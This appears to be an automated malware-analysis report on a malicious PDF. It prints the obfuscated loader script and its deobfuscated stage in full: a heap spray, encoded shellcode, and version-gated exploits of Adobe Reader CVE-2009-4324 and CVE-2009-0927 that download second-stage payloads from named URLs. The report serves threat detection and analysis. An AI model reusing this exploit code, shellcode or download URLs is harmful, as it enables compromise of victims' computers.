PDF malware analysis — malicious · ce4d3beaa246215a

MALICIOUS

PDF

13.8 KB First seen: 2026-05-09

MD5: a83314767a1bdee46793ab941b95f4f0 SHA-1: 79289138b9271173706fd4201b4bb6476eb8d918 SHA-256: ce4d3beaa246215aeed330427697c8baea7f4672f8e59fc11eb742c31cdba843

310 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple CVEs (CVE-2009-4324 and CVE-2009-0927) in Adobe Reader, specifically targeting the media.newPlayer and Collab.getIcon functions. The deobfuscated JavaScript indicates that it downloads a second-stage payload from the URLs http://1heidi-algebra.345.pl/ptyapty/ac2c1c2131ea02b01f3178a9f54da916/d7.php?f=g and http://1heidi-algebra.345.pl/ptyapty/ac2c1c2131ea02b01f3178a9f54da916/d8.php?f=n. This behavior is consistent with a downloader or initial access exploit.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://1heidi-algebra.345.pl/ptyapty/ac2c1c2131ea02b01f3178a9f54da916/d7.php?f=g Referenced by PDF JavaScript
- http://1heidi-algebra.345.pl/ptyapty/ac2c1c2131ea02b01f3178a9f54da916/d8.php?f=nReferenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0076_000.js`	pdf-javascript-stream	PDF /JS object 76 at offset 0x38A	13019 bytes
SHA-256: `f7ae6a0e50a859772d87ac1d1f5ba500c4268c7b71ddcc30df953138f0c7aedd`
Preview script First 1,000 lines of the extracted script a=",1-5(P48at+hVnEw_>l{xf:7%d=pF} m)vSy6'I]ebu;r9[B3&0sCNc<\|@Ai2oD.g"; w=''; w+='sl'; w+='i'; w+="c"+a[40]; j='b343tb3g'; j=j[w]; z =new Array (33,8,44,30,16,1,61,26,37,24,42,7,48,36,36,24,42,28,52,14,6,24,42,7,3,28,52,24,42,23,3,14,6,24,42,14,45,48,6,24,42,48,48,3,28,24,42,36,6,52,50,24,42,6,50,7,47,24,42,7,47,48,50,24,42,50,52,6,50,24,42,23,50,7,47,24,42,3,36,1,52,24,42,23,36,7,47,24,42,48,48,50,7,24,42,36,36,62,47,24,42,3,14,7,47,24,42,50,48,48,52,24,42,48,48,23,6,24,42,7,1,60,52,24,42,1,3,14,14,24,42,28,28,1,50,24,42,47,7,28,28,24,42,6,50,7,47,24,42,52,48,48,50,24,42,48,45,6,36,24,42,23,3,50,36,24,42,7,23,28,47,24,42,60,6,48,6,24,42,14,6,7,3,24,42,3,1,23,3,24,42,14,47,14,45,24,42,3,1,6,52,24,42,7,47,3,36,24,42,48,52,23,3,24,42,23,6,7,47,24,42,23,7,48,3,24,42,28,3,50,48,24,42,7,47,3,36,24,42,60,50,23,36,24,42,28,3,50,48,24,42,52,45,48,48,24,42,6,1,6,45,24,42,58,62,28,52,24,42,52,3,50,48,24,42,62,47,48,48,24,42,47,14,50,28,24,42,48,7,1,50,24,42,23,6,28,60,24,42,52,1,50,7,24,42,50,62,52,47,24,42,62,58,50,48,24,42,14,47,6,50,24,42,48,47,28,1,24,42,23,3,1,28,24,42,3,14,14,36,24,42,3,14,7,47,24,42,50,48,60,6,24,42,36,36,62,62,24,42,50,52,7,47,24,42,7,62,6,47,24,42,14,52,6,36,24,42,3,6,28,28,24,42,50,52,60,6,24,42,62,7,7,47,24,42,62,62,50,48,24,42,50,6,7,47,24,42,50,48,7,47,24,42,58,47,52,3,24,42,3,45,3,14,24,42,14,47,52,48,24,42,58,62,3,48,24,42,36,7,7,47,24,42,7,50,60,50,24,42,50,52,23,62,24,42,23,6,48,48,24,42,45,36,50,48,24,42,28,48,14,47,24,42,36,7,7,47,24,42,7,47,50,7,24,42,36,58,28,23,24,42,3,45,50,3,24,42,45,7,14,7,24,42,28,28,28,28,24,42,14,60,28,28,24,42,14,7,28,45,24,42,50,50,50,50,24,42,50,50,50,50,24,42,3,50,3,7,24,42,6,50,36,58,24,42,28,28,36,7,24,42,50,50,50,50,24,42,3,50,50,50,24,42,52,50,7,48,24,42,3,50,1,45,24,42,7,47,3,3,24,42,7,47,14,52,24,42,1,50,3,14,24,42,52,48,7,48,24,42,28,28,50,3,24,42,36,7,14,48,24,42,36,14,36,28,24,42,50,50,50,50,24,42,23,3,36,7,24,42,36,52,23,60,24,42,3,6,36,62,24,42,1,36,28,28,24,42,52,6,7,48,24,42,7,47,50,7,24,42,14,7,14,7,24,42,28,28,36,1,24,42,28,28,28,28,24,42,50,60,14,47,24,42,23,60,14,47,24,42,14,52,7,1,24,42,50,1,50,6,24,42,50,50,50,50,24,42,3,52,7,62,24,42,50,52,60,6,24,42,50,6,52,23,24,42,23,60,60,6,24,42,36,23,36,3,24,42,52,23,23,48,24,42,60,6,6,6,24,42,23,36,50,6,24,42,48,48,23,60,24,42,52,23,48,60,24,42,60,6,6,6,24,42,60,50,50,7,24,42,23,48,60,62,24,42,3,48,60,50,24,42,28,7,36,7,24,42,50,50,50,50,24,42,28,28,50,50,24,42,50,52,3,36,24,42,14,7,7,47,24,42,52,45,48,48,24,42,52,23,3,1,24,42,1,62,6,6,24,42,23,23,50,50,24,42,36,60,23,50,24,42,52,23,23,6,24,42,1,62,6,6,24,42,60,14,50,3,24,42,36,52,36,6,24,42,52,36,36,52,24,42,1,62,6,6,24,42,50,50,50,45,24,42,7,58,3,45,24,42,50,6,52,1,24,42,7,7,48,50,24,42,1,62,6,6,24,42,6,1,50,6,24,42,36,58,3,1,24,42,36,58,50,50,24,42,3,48,50,50,24,42,36,58,3,23,24,42,28,28,50,50,24,42,1,6,3,36,24,42,52,50,7,3,24,42,1,36,23,3,24,42,50,50,36,58,24,42,28,28,3,48,24,42,50,6,3,36,24,42,50,50,36,58,24,42,14,47,7,48,24,42,3,48,50,52,24,42,3,36,28,28,24,42,7,48,50,6,24,42,50,52,52,48,24,42,50,60,14,47,24,42,1,48,14,47,24,42,7,50,6,23,24,42,50,50,48,28,24,42,28,58,23,3,24,42,7,50,6,23,24,42,50,50,48,28,24,42,52,6,23,3,24,42,50,50,36,58,24,42,28,14,36,58,24,42,3,36,28,28,24,42,14,7,50,7,24,42,28,14,45,52,24,42,28,28,28,28,24,42,6,14,7,14,24,42,14,52,50,14,24,42,28,14,45,7,24,42,50,14,7,58,24,42,36,28,7,45,24,42,47,62,50,1,24,42,52,58,48,48,24,42,3,47,7,58,24,42,52,36,1,47,24,42,23,45,6,36,24,42,1,58,48,36,24,42,23,50,60,28,24,42,23,6,36,7,24,42,23,50,23,6,24,42,60,28,48,58,24,42,48,1,60,28,24,42,36,3,36,7,24,42,36,6,36,45,24,42,60,62,36,45,24,42,36,52,36,1,24,42,36,3,36,23,24,42,23,60,36,60,24,42,60,14,36,1,24,42,48,6,48,48,24,42,60,14,48,3,24,42,36,52,23,50,24,42,23,50,60,28,24,42,23,45,23,6,24,42,23,50,36,1,24,42,23,45,23,6,24,42,36,1,60,28,24,42,48,60,36,48,24,42,48,1,36,48,24,42,48,60,36,48,24,42,48,48,48,1,24,42,36,3,48,1,24,42,48,50,36,1,24,42,36,60,48,60,24,42,48,1,48,50,24,42,48,48,36,36,24,42,48,23,48,1,24,42,36,1,48,7,24,42,36,36,48,45,24,42,48,6,48,3,24,42,36,1,36,6,24,42,48,1,48,45,24,42,60,28,48,36,24,42,48,23,36,6,24,42,23,50,60,14,24,42,23,50,36,7,24,42,36,36,48,28,24,42,36,23,48,62,24,42,50,50,50,50,37,43,33,8,44,30,16,60,61,26,37,24,42,7,48,36,36,24,42,28,52,14,6,24,42,7,3,28,52,24,42,23,3,14,6,24,42,14,45,48,6,24,42,48,48,3,28,24,42,36,6,52,50,24,42,6,50,7,47,24,42,7,47,48,50,24,42,50,52,6,50,24,42,23,50,7,47,24,42,3,36,1,52,24,42,23,36,7,47,24,42,48,48,50,7,24,42,36,36,62,47,24,42,3,14,7,47,24,42,50,48,48,52,24,42,48,48,23,6,24,42,7,1,60,52,24,42,1,3,14,14,24,42,28,28,1,50,24,42,47,7,28,28,24,42,6,50,7,47,24,42,52,48,48,50,24,42,48,45,6,36,24,42,23,3,50,36,24,42,7,23,28,47,24,42,60,6,48,6,24,42,14,6,7,3,24,42,3,1,23,3,24,42,14,47,14,45,24,42,3,1,6,52,24,42,7,47,3,36,24,42,48,52,23,3,24,42,23,6,7,47,24,42,23,7,48,3,24,42,28,3,50,48,24,42,7,47,3,36,24,42,60,50,23,36,24,42,28,3,50,48,24,42,52,45,48,48,24,42,6,1,6,45,24,42,58,62,28,52,24,42,52,3,50,48,24,42,62,47,48,48,24,42,47,14,50,28,24,42,48,7,1,50,24,42,23,6,28,60,24,42,52,1,50,7,24,42,50,62,52,47,24,42,62,58,50,48,24,42,14,47,6,50,24,42,48,47,28,1,24,42,23,3,1,28,24,42,3,14,14,36,24,42,3,14,7,47,24,42,50,48,60,6,24,42,36,36,62,62,24,42,50,52,7,47,24,42,7,62,6,47,24,42,14,52,6,36,24,42,3,6,28,28,24,42,50,52,60,6,24,42,62,7,7,47,24,42,62,62,50,48,24,42,50,6,7,47,24,42,50,48,7,47,24,42,58,47,52,3,24,42,3,45,3,14,24,42,14,47,52,48,24,42,58,62,3,48,24,42,36,7,7,47,24,42,7,50,60,50,24,42,50,52,23,62,24,42,23,6,48,48,24,42,45,36,50,48,24,42,28,48,14,47,24,42,36,7,7,47,24,42,7,47,50,7,24,42,36,58,28,23,24,42,3,45,50,3,24,42,45,7,14,7,24,42,28,28,28,28,24,42,14,60,28,28,24,42,14,7,28,45,24,42,50,50,50,50,24,42,50,50,50,50,24,42,3,50,3,7,24,42,6,50,36,58,24,42,28,28,36,7,24,42,50,50,50,50,24,42,3,50,50,50,24,42,52,50,7,48,24,42,3,50,1,45,24,42,7,47,3,3,24,42,7,47,14,52,24,42,1,50,3,14,24,42,52,48,7,48,24,42,28,28,50,3,24,42,36,7,14,48,24,42,36,14,36,28,24,42,50,50,50,50,24,42,23,3,36,7,24,42,36,52,23,60,24,42,3,6,36,62,24,42,1,36,28,28,24,42,52,6,7,48,24,42,7,47,50,7,24,42,14,7,14,7,24,42,28,28,36,1,24,42,28,28,28,28,24,42,50,60,14,47,24,42,23,60,14,47,24,42,14,52,7,1,24,42,50,1,50,6,24,42,50,50,50,50,24,42,3,52,7,62,24,42,50,52,60,6,24,42,50,6,52,23,24,42,23,60,60,6,24,42,36,23,36,3,24,42,52,23,23,48,24,42,60,6,6,6,24,42,23,36,50,6,24,42,48,48,23,60,24,42,52,23,48,60,24,42,60,6,6,6,24,42,60,50,50,7,24,42,23,48,60,62,24,42,3,48,60,50,24,42,28,7,36,7,24,42,50,50,50,50,24,42,28,28,50,50,24,42,50,52,3,36,24,42,14,7,7,47,24,42,52,45,48,48,24,42,52,23,3,1,24,42,1,62,6,6,24,42,23,23,50,50,24,42,36,60,23,50,24,42,52,23,23,6,24,42,1,62,6,6,24,42,60,14,50,3,24,42,36,52,36,6,24,42,52,36,36,52,24,42,1,62,6,6,24,42,50,50,50,45,24,42,7,58,3,45,24,42,50,6,52,1,24,42,7,7,48,50,24,42,1,62,6,6,24,42,6,1,50,6,24,42,36,58,3,1,24,42,36,58,50,50,24,42,3,48,50,50,24,42,36,58,3,23,24,42,28,28,50,50,24,42,1,6,3,36,24,42,52,50,7,3,24,42,1,36,23,3,24,42,50,50,36,58,24,42,28,28,3,48,24,42,50,6,3,36,24,42,50,50,36,58,24,42,14,47,7,48,24,42,3,48,50,52,24,42,3,36,28,28,24,42,7,48,50,6,24,42,50,52,52,48,24,42,50,60,14,47,24,42,1,48,14,47,24,42,7,50,6,23,24,42,50,50,48,28,24,42,28,58,23,3,24,42,7,50,6,23,24,42,50,50,48,28,24,42,52,6,23,3,24,42,50,50,36,58,24,42,28,14,36,58,24,42,3,36,28,28,24,42,14,7,50,7,24,42,28,14,45,52,24,42,28,28,28,28,24,42,6,14,7,14,24,42,14,52,50,14,24,42,28,14,45,7,24,42,50,14,7,58,24,42,36,28,7,45,24,42,47,62,50,1,24,42,52,58,48,48,24,42,3,47,7,58,24,42,52,36,1,47,24,42,23,45,6,36,24,42,1,58,48,36,24,42,23,50,60,28,24,42,23,6,36,7,24,42,23,50,23,6,24,42,60,28,48,58,24,42,48,1,60,28,24,42,36,3,36,7,24,42,36,6,36,45,24,42,60,62,36,45,24,42,36,52,36,1,24,42,36,3,36,23,24,42,23,60,36,60,24,42,60,14,36,1,24,42,48,6,48,48,24,42,60,14,48,3,24,42,36,52,23,50,24,42,23,50,60,28,24,42,23,45,23,6,24,42,23,50,36,1,24,42,23,45,23,6,24,42,36,1,60,28,24,42,48,60,36,48,24,42,48,1,36,48,24,42,48,60,36,48,24,42,48,48,48,1,24,42,36,3,48,1,24,42,48,50,36,1,24,42,36,60,48,60,24,42,48,1,48,50,24,42,48,48,36,36,24,42,48,23,48,1,24,42,36,1,48,7,24,42,36,36,48,45,24,42,48,6,48,3,24,42,36,1,36,6,24,42,48,1,48,45,24,42,60,28,48,36,24,42,48,7,36,6,24,42,23,50,60,14,24,42,23,50,36,7,24,42,36,36,48,28,24,42,36,14,48,62,24,42,50,50,50,50,37,43,21,42,13,54,9,59,61,13,30,16,48,61,4,32,19,33,8,44,30,16,6,61,26,8,27,27,63,33,59,40,15,40,44,12,40,44,51,59,61,13,63,9,61,34,9,44,59,13,64,4,32,43,16,6,61,26,16,6,61,63,44,40,27,18,8,54,40,4,37,63,37,0,37,37,32,43,15,11,59,18,40,4,16,6,61,63,18,40,13,64,9,11,55,6,32,19,16,6,61,10,26,37,50,37,43,29,16,6,61,26,27,8,44,51,40,38,13,9,4,16,6,61,0,1,50,32,43,44,40,9,42,44,13,30,16,6,61,43,29,21,42,13,54,9,59,61,13,30,16,3,61,4,32,19,21,42,13,54,9,59,61,13,30,16,36,61,4,32,19,33,8,44,30,16,23,61,26,37,27,57,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,30,22,30,35,35,35,35,1,1,1,37,43,42,9,59,18,63,27,44,59,13,9,25,4,16,23,61,0,13,40,15,30,62,8,9,40,4,32,32,43,29,33,8,44,30,16,7,61,26,1,60,50,50,50,43,16,45,61,26,13,40,15,30,58,44,44,8,35,4,32,43,33,8,44,30,16,1,61,50,26,37,24,42,45,50,45,50,24,42,45,50,45,50,37,43,33,8,44,30,16,1,61,1,26,16,60,61,43,16,1,61,50,26,42,13,40,51,54,8,27,40,4,16,1,61,50,32,43,16,1,61,1,26,42,13,40,51,54,8,27,40,4,16,1,61,1,32,43,15,11,59,18,40,4,16,1,61,50,63,18,40,13,64,9,11,55,26,50,20,7,50,50,50,32,19,16,1,61,50,10,26,16,1,61,50,43,29,16,1,61,50,26,16,1,61,50,63,51,42,41,51,9,44,4,50,0,50,20,7,50,50,50,2,16,1,61,1,63,18,40,13,64,9,11,32,43,30,21,61,44,4,16,1,61,60,26,50,43,16,1,61,60,55,16,7,61,43,16,1,61,60,10,10,32,19,16,45,61,46,16,1,61,60,39,26,16,1,61,50,10,16,1,61,1,43,29,59,21,4,16,7,61,32,19,16,36,61,4,32,43,16,36,61,4,32,43,9,44,35,19,9,11,59,51,63,31,40,25,59,8,63,13,40,15,5,18,8,35,40,44,4,13,42,18,18,32,43,29,54,8,9,54,11,4,40,32,19,29,16,36,61,4,32,43,29,29,21,42,13,54,9,59,61,13,30,16,1,61,48,4,32,19,33,8,44,30,16,1,61,6,26,42,13,40,51,54,8,27,40,4,16,1,61,32,43,16,1,61,3,26,42,13,40,51,54,8,27,40,4,37,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,24,42,45,50,45,50,37,32,10,16,1,61,6,43,16,1,61,36,26,42,13,40,51,54,8,27,40,4,37,24,42,45,50,45,50,24,42,45,50,45,50,37,32,43,16,1,61,23,26,1,50,43,16,1,61,7,26,16,1,61,23,10,16,1,61,3,63,18,40,13,64,9,11,43,15,11,59,18,40,4,16,1,61,36,63,18,40,13,64,9,11,55,16,1,61,7,32,16,1,61,36,10,26,16,1,61,36,43,16,1,61,45,26,16,1,61,36,63,51,42,41,51,9,44,59,13,64,4,50,0,16,1,61,7,32,43,16,60,61,60,26,16,1,61,36,63,51,42,41,51,9,44,59,13,64,4,50,0,16,1,61,36,63,18,40,13,64,9,11,2,16,1,61,7,32,43,15,11,59,18,40,4,16,60,61,60,63,18,40,13,64,9,11,10,16,1,61,7,55,50,20,6,50,50,50,50,32,16,60,61,60,26,16,60,61,60,10,16,60,61,60,10,16,1,61,45,43,16,60,61,50,26,13,40,15,30,58,44,44,8,35,4,32,43,21,61,44,4,16,60,61,1,26,50,43,16,60,61,1,55,1,7,50,43,16,60,61,1,10,10,32,16,60,61,50,46,16,60,61,1,39,26,16,60,61,60,10,16,1,61,3,43,33,8,44,30,16,60,61,48,26,6,50,1,60,43,33,8,44,30,16,60,61,6,26,58,44,44,8,35,4,16,60,61,48,32,43,21,61,44,4,16,60,61,1,26,50,43,16,60,61,1,55,16,60,61,48,43,16,60,61,1,10,10,32,19,16,60,61,6,46,16,60,61,1,39,26,42,13,40,51,54,8,27,40,4,37,24,50,8,24,50,8,24,50,8,24,50,8,37,32,43,29,52,61,18,18,8,41,63,64,40,9,38,54,61,13,4,16,60,61,6,10,37,16,53,63,41,42,13,25,18,40,37,32,43,29,33,8,44,30,16,6,61,26,16,48,61,4,32,43,59,21,4,4,4,16,6,61,17,7,45,3,50,32,49,49,4,16,6,61,55,45,50,3,50,32,32,56,56,4,4,16,6,61,17,26,7,50,50,50,32,49,49,4,16,6,61,55,26,7,1,50,60,32,32,32,19,16,1,61,48,4,32,43,29,40,18,51,40,30,59,21,4,4,16,6,61,17,26,45,1,50,50,32,56,56,4,16,6,61,55,26,45,60,50,50,32,56,56,4,16,6,61,17,26,7,1,50,48,32,56,56,4,16,6,61,55,26,7,1,50,23,32,32,19,16,3,61,4,32,43,29); s=''; b = 'al'; b2 =a[40] + a[33]+b;for (i=0;i<z.length;i++) {s+=a[z[i]]} e=(j()); e=e[b2]; e(s);
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A	4505 bytes
SHA-256: `0b1d9cd5fe1246eed5c5c55343cd61d36c8f659164f3e12690f697c4969f6937`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u312F%u6568%u6469%u2D69%u6C61%u6567%u7262%u2E61%u3433%u2E35%u6C70%u702F%u7974%u7061%u7974%u612F%u3263%u3163%u3263%u3331%u6531%u3061%u6232%u3130%u3366%u3731%u6138%u6639%u3435%u6164%u3139%u2F36%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u312F%u6568%u6469%u2D69%u6C61%u6567%u7262%u2E61%u3433%u2E35%u6C70%u702F%u7974%u7061%u7974%u612F%u3263%u3163%u3263%u3331%u6531%u3061%u6232%u3130%u3366%u3731%u6138%u6639%u3435%u6164%u3139%u2F36%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))\|\|((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)\|\|(_4o<=9200)\|\|(_4o>=8103)\|\|(_4o<=8107)){_5o();}
`generic_stage_recovery_001.js`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A	4497 bytes
SHA-256: `5c5f247ff1b700281239b6017ba3dcda5ba630435eed3aa2785dd088cc12a85f`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
